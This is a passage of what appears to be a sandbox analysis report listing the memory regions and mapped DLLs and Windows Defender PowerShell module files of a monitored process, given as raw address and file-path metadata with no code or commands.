"\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2541 start_va = 0x1aaf0000 end_va = 0x1ab6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aaf0000" filename = "" Region: id = 2542 start_va = 0x1ab70000 end_va = 0x1abeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ab70000" filename = "" Region: id = 2543 start_va = 0x7fff48070000 end_va = 0x7fff4807ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48070000" filename = "" Region: id = 2544 start_va = 0x7fffab9b0000 end_va = 0x7fffabafefff monitored = 1 entry_point = 0x7fffab9b1090 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 2545 start_va = 0x1f80000 end_va = 0x1f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 2546 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2547 start_va = 0x7fff48080000 end_va = 0x7fff4808ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48080000" filename = "" Region: id = 2548 start_va = 0x7fffa43f0000 end_va = 0x7fffa4451fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P6f792626#\\4e1b2f1d1e853a774b9a06a9bcd657ec\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p6f792626#\\4e1b2f1d1e853a774b9a06a9bcd657ec\\microsoft.powershell.security.ni.dll") Region: id = 2549 start_va = 0x1abf0000 end_va = 0x1ac2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 2550 start_va = 0x7fff48090000 end_va = 0x7fff4809ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48090000" filename = "" Region: id = 2551 start_va = 0x7fffa4310000 end_va = 0x7fffa43eafff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Transactions\\430a9e8244a211240808d63b95b9d4c8\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.transactions\\430a9e8244a211240808d63b95b9d4c8\\system.transactions.ni.dll") Region: id = 2552 start_va = 0x7fffa42c0000 end_va = 0x7fffa430efff monitored = 1 entry_point = 0x7fffa42e0902 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 2553 start_va = 0x1ac30000 end_va = 0x1ac7cfff monitored = 1 entry_point = 0x1ac50902 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 2555 start_va = 0x7fffb5d40000 end_va = 0x7fffb5d4bfff monitored = 0 entry_point = 0x7fffb5d42560 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2556 start_va = 0x7fffca060000 end_va = 0x7fffca090fff monitored = 0 entry_point = 0x7fffca06e380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2557 start_va = 0x1ac30000 end_va = 0x1acaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac30000" filename = "" Region: id = 2558 start_va = 0x7fff480a0000 end_va = 0x7fff480affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff480a0000" filename = "" Region: id = 2559 start_va = 0x7fff480b0000 end_va = 0x7fff480bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff480b0000" filename = "" Region: id = 2634 start_va = 0x7fff480c0000 end_va = 0x7fff480cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff480c0000" filename = "" Region: id = 2635 start_va = 0x7fff480d0000 end_va = 0x7fff480dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff480d0000" filename = "" Region: id = 2644 start_va = 0x7fff480e0000 end_va = 0x7fff480effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff480e0000" filename = "" Region: id = 2645 start_va = 0x7fff480f0000 end_va = 0x7fff480fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff480f0000" filename = "" Region: id = 2646 start_va = 0x7fff48100000 end_va = 0x7fff4810ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48100000" filename = "" Region: id = 2647 start_va = 0x7fff48110000 end_va = 0x7fff4811ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48110000" filename = "" Region: id = 2648 start_va = 0x7fff48120000 end_va = 0x7fff4812ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48120000" filename = "" Region: id = 2649 start_va = 0x7fff48130000 end_va = 0x7fff4813ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48130000" filename = "" Region: id = 2650 start_va = 0x7fff48140000 end_va = 0x7fff4814ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48140000" filename = "" Region: id = 2652 start_va = 0x1acb0000 end_va = 0x1aeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001acb0000" filename = "" Region: id = 2653 start_va = 0x7fff48150000 end_va = 0x7fff4815ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48150000" filename = "" Region: id = 2654 start_va = 0x7fff48160000 end_va = 0x7fff4816ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48160000" filename = "" Region: id = 2655 start_va = 0x7fff48170000 end_va = 0x7fff4817ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48170000" filename = "" Region: id = 2656 start_va = 0x7fff48180000 end_va = 0x7fff4818ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48180000" filename = "" Region: id = 2657 start_va = 0x7fff48190000 end_va = 0x7fff4819ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48190000" filename = "" Region: id = 2658 start_va = 0x1aeb0000 end_va = 0x1b83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aeb0000" filename = "" Region: id = 2659 start_va = 0x7fffc7c60000 end_va = 0x7fffc7cfefff monitored = 0 entry_point = 0x7fffc7c89120 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2660 start_va = 0x2040000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2662 start_va = 0x7fff481a0000 end_va = 0x7fff481affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff481a0000" filename = "" Region: id = 2663 start_va = 0x7fffa3f90000 end_va = 0x7fffa4078fff monitored = 0 entry_point = 0x7fffa401be70 region_type = mapped_file name = "mpclient.dll" filename = "\\Program Files\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files\\windows defender\\mpclient.dll") Region: id = 2664 start_va = 0x1f90000 end_va = 0x1f93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 2665 start_va = 0x1f90000 end_va = 0x1f93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 2666 start_va = 0x1abf0000 end_va = 0x1ac2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 2667 start_va = 0x7fff481b0000 end_va = 0x7fff481bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff481b0000" filename = "" Region: id = 2668 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2669 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2670 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2671 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2672 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2673 start_va = 0x2060000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 2674 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2675 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2676 start_va = 0x2050000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 2678 start_va = 0x1b840000 end_va = 0x1b87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b840000" filename = "" Region: id = 2679 start_va = 0x2040000 end_va = 0x2050fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002040000" filename = "" Region: id = 2680 start_va = 0x1f90000 end_va = 0x1f93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "defender.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1") Region: id = 2681 start_va = 0x1f90000 end_va = 0x1f93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "defender.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1") Region: id = 2682 start_va = 0x1f90000 end_va = 0x1f92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 2683 start_va = 0x1abf0000 end_va = 0x1ac2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 2684 start_va = 0x1b880000 end_va = 0x1b8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b880000" filename = "" Region: id = 2685 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2686 start_va = 0x1f90000 end_va = 0x1f93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpcomputerstatus.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml") Region: id = 2687 start_va = 0x1f90000 end_va = 0x1f92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 2689 start_va = 0x7fff481c0000 end_va = 0x7fff481cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff481c0000" filename = "" Region: id = 2690 start_va = 0x7fff9fe70000 end_va = 0x7fffa00a4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\4b76f649191e82611b217d651ae1d75b\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pae3498d9#\\4b76f649191e82611b217d651ae1d75b\\microsoft.powershell.commands.management.ni.dll") Region: id = 2691 start_va = 0x7fff481d0000 end_va = 0x7fff481dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff481d0000" filename = "" Region: id = 2692 start_va = 0x1abf0000 end_va = 0x1ac2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 2693 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2694 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2695 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2696 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2697 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2698 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2699 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2700 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2701 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2702 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2703 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2704 start_va = 0x7fff481e0000 end_va = 0x7fff481effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff481e0000" filename = "" Region: id = 2705 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2706 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2707 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2708 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2709 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2710 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mppreference.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml") Region: id = 2711 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mppreference.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml") Region: id = 2712 start_va = 0x1f90000 end_va = 0x1f92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 2717 start_va = 0x1abf0000 end_va = 0x1ac2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 2718 start_va = 0x1f90000 end_va = 0x1f93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpthreat.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml") Region: id = 2719 start_va = 0x1f90000 end_va = 0x1f92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 2720 start_va = 0x1f90000 end_va = 0x1f93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpthreatcatalog.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml") Region: id = 2721 start_va = 0x1f90000 end_va = 0x1f92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 2722 start_va = 0x1f90000 end_va = 0x1f93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpthreatdetection.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml") Region: id = 2723 start_va = 0x1f90000 end_va = 0x1f92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 2724 start_va = 0x1f90000 end_va = 0x1f93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpscan.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml") Region: id = 2725 start_va = 0x1f90000 end_va = 0x1f92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 2726 start_va = 0x1f90000 end_va = 0x1f93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpsignature.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml") Region: id = 2727 start_va = 0x1f90000 end_va = 0x1f92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 2728 start_va = 0x1f90000 end_va = 0x1f93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpwdoscan.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml") Region: id = 2729 start_va = 0x1f90000 end_va = 0x1f92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 2730 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2731 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2732 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2733 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 2734 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 2735 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2736 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2737 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2738 start_va = 0x7fff481f0000 end_va = 0x7fff481fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff481f0000" filename = "" Region: id = 2739 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2740 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2741 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2742 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2743 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2744 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 2745 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 2746 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 2747 start_va = 0x1ac20000 end_va = 0x1ac2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac20000" filename = "" Region: id = 2748 start_va = 0x1b900000 end_va = 0x1b90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b900000" filename = "" Region: id = 2749 start_va = 0x1b910000 end_va = 0x1b91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b910000" filename = "" Region: id = 2750 start_va = 0x1b920000 end_va = 0x1b92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b920000" filename = "" Region: id = 2751 start_va = 0x1b930000 end_va = 0x1b93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b930000" filename = "" Region: id = 2752 start_va = 0x1b940000 end_va = 0x1b94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 2753 start_va = 0x1b950000 end_va = 0x1b95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b950000" filename = "" Region: id = 2754 start_va = 0x1b960000 end_va = 0x1b96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b960000" filename = "" Region: id = 2755 start_va = 0x1b970000 end_va = 0x1b97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b970000" filename = "" Region: id = 2756 start_va = 0x1b980000 end_va = 0x1b98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b980000" filename = "" Region: id = 2757 start_va = 0x1b990000 end_va = 0x1b99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b990000" filename = "" Region: id = 2758 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2759 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2760 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2761 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 2762 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2763 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2764 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2765 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2766 start_va = 